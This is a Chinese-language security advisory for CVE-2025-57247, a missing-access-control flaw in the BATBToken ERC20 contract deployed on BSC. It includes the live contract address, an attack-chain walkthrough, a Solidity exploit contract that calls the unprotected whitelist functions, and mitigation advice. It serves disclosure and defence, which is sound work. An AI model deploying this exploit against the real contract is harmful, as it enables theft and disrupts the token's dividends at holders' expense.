CVE-2025-57247：BATBToken智能合约访问控制缺陷漏洞

漏洞信息

漏洞编号

CVE-2025-57247

漏洞类型

访问控制缺陷/权限提升

CVSS评分

9.1 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

BATBToken (ERC20智能合约)

漏洞概述

CVE-2025-57247是BATBToken智能合约（合约地址：0xfbf1388408670c02f0dbbb74251d8ded1d63b7a2，编译器版本：v0.8.26+commit.8a97fa7a）中存在的一个严重访问控制缺陷漏洞。该漏洞位于基础ERC20合约的白名单管理功能中，具体涉及setColdWhiteList()和setSpecialAddress()两个关键函数。这两个函数被错误地声明为public类型，未添加任何访问控制修饰符（如onlyOwner），导致任何外部用户都可以直接调用这些函数来操纵白名单设置。该漏洞的CVSS评分为9.1，属于严重级别，其向量为CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H，表明该漏洞可通过网络远程利用，无需任何权限认证和用户交互即可触发。攻击者可绕过冷钱包转账时间限制，操纵特殊地址设置，进而破坏合约的分红分配机制。此漏洞不仅导致权限提升，还违反了合约原本设计的代币经济模型（tokenomics），可能对持有者和项目方造成重大经济损失。该漏洞已于2025年10月6日公开披露，影响部署在BSC（币安智能链）上的BATBToken合约。

技术细节

BATBToken智能合约基于ERC20标准实现，继承了一个基础合约来扩展功能。基础合约中定义了两个关键的管理函数：setColdWhiteList()用于管理冷钱包白名单，控制特定地址的转账冷却时间限制；setSpecialAddress()用于设置特殊地址，可能与分红分配或特权操作相关。漏洞的根本原因在于这两个函数被声明为public而非private或internal，且未使用任何访问控制修饰符（如onlyOwner、require(msg.sender == owner)等）。在Solidity中，public关键字仅表示函数可以被外部调用以及自动生成getter函数，并不提供任何访问控制能力。攻击者只需构造一个简单的交易，调用setColdWhiteList()将自己的地址添加到冷钱包白名单中，即可绕过合约设计的转账冷却时间限制。类似地，调用setSpecialAddress()可以将任意地址设置为特殊地址，从而干扰正常的分红分配流程。由于合约部署在BSC上，攻击成本极低（仅需支付少量Gas费），且整个攻击过程无需任何权限或交互。利用流程如下：1）攻击者调用setColdWhiteList()将目标地址加入白名单；2）攻击者绕过冷钱包转账限制进行大额转账；3）攻击者调用setSpecialAddress()操纵分红地址设置；4）攻击者通过特权操作窃取代币或破坏代币经济模型。

攻击链分析

STEP 1

步骤1：漏洞发现

攻击者通过分析BATBToken智能合约的源代码，发现setColdWhiteList()和setSpecialAddress()函数被声明为public且缺少访问控制修饰符，任何用户均可调用。

STEP 2

步骤2：绕过转账限制

攻击者部署攻击合约，调用setColdWhiteList()将自己的地址添加到冷钱包白名单中，从而绕过合约设计的转账冷却时间限制。

STEP 3

步骤3：操纵特殊地址

攻击者调用setSpecialAddress()将任意地址设置为特殊地址，破坏合约的分红分配机制，可能导致分红被窃取或分配异常。

STEP 4

步骤4：权限提升与代币窃取

攻击者利用已获得的特权进行大额转账操作，窃取代币或破坏代币经济模型，导致项目方和持有者遭受重大经济损失。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.26;

// PoC for CVE-2025-57247: BATBToken Access Control Vulnerability
// This PoC demonstrates how any user can call whitelist management functions
// without proper access control.

interface IBATBToken {
    // Vulnerable functions in the base ERC20 contract
    function setColdWhiteList(address addr, bool status) external;
    function setSpecialAddress(address addr) external;
    function transfer(address to, uint256 amount) external returns (bool);
    function balanceOf(address account) external view returns (uint256);
}

contract Exploit {
    IBATBToken public target;

    constructor(address _target) {
        target = IBATBToken(_target);
    }

    function exploit() external {
        // Step 1: Add attacker's address to cold whitelist to bypass transfer restrictions
        // No access control check - any user can call this
        target.setColdWhiteList(address(this), true);

        // Step 2: Manipulate special address settings to disrupt dividend distribution
        // No access control check - any user can call this
        target.setSpecialAddress(address(this));

        // Step 3: Now attacker can bypass cold time transfer restrictions
        // and potentially steal tokens or manipulate tokenomics
        uint256 balance = target.balanceOf(address(this));
        if (balance > 0) {
            target.transfer(msg.sender, balance);
        }
    }

    receive() external payable {}
}

/*
 * Attack Steps:
 * 1. Deploy the Exploit contract with the BATBToken address as constructor argument
 * 2. Call exploit() on the Exploit contract
 * 3. The exploit contract will:
 *    a. Call setColdWhiteList() to add itself to the cold whitelist (bypassing restrictions)
 *    b. Call setSpecialAddress() to manipulate dividend distribution
 *    c. Transfer any tokens held by the exploit contract to the attacker
 *
 * Note: This vulnerability requires no authentication, no user interaction,
 * and can be exploited remotely via network (AV:N, PR:N, UI:N).
 */

影响范围

BATBToken合约地址 0xfbf1388408670c02f0dbbb74251d8ded1d63b7a2 (Compiler v0.8.26+commit.8a97fa7a)

防御指南

临时缓解措施

建议项目方立即部署修复后的合约版本，添加适当的访问控制修饰符（如onlyOwner）到setColdWhiteList()和setSpecialAddress()函数。在修复部署前，应通过紧急治理机制暂停相关函数，或将合约迁移到新地址并通知所有持有者。同时，建议用户暂停与该合约的交互，避免遭受损失。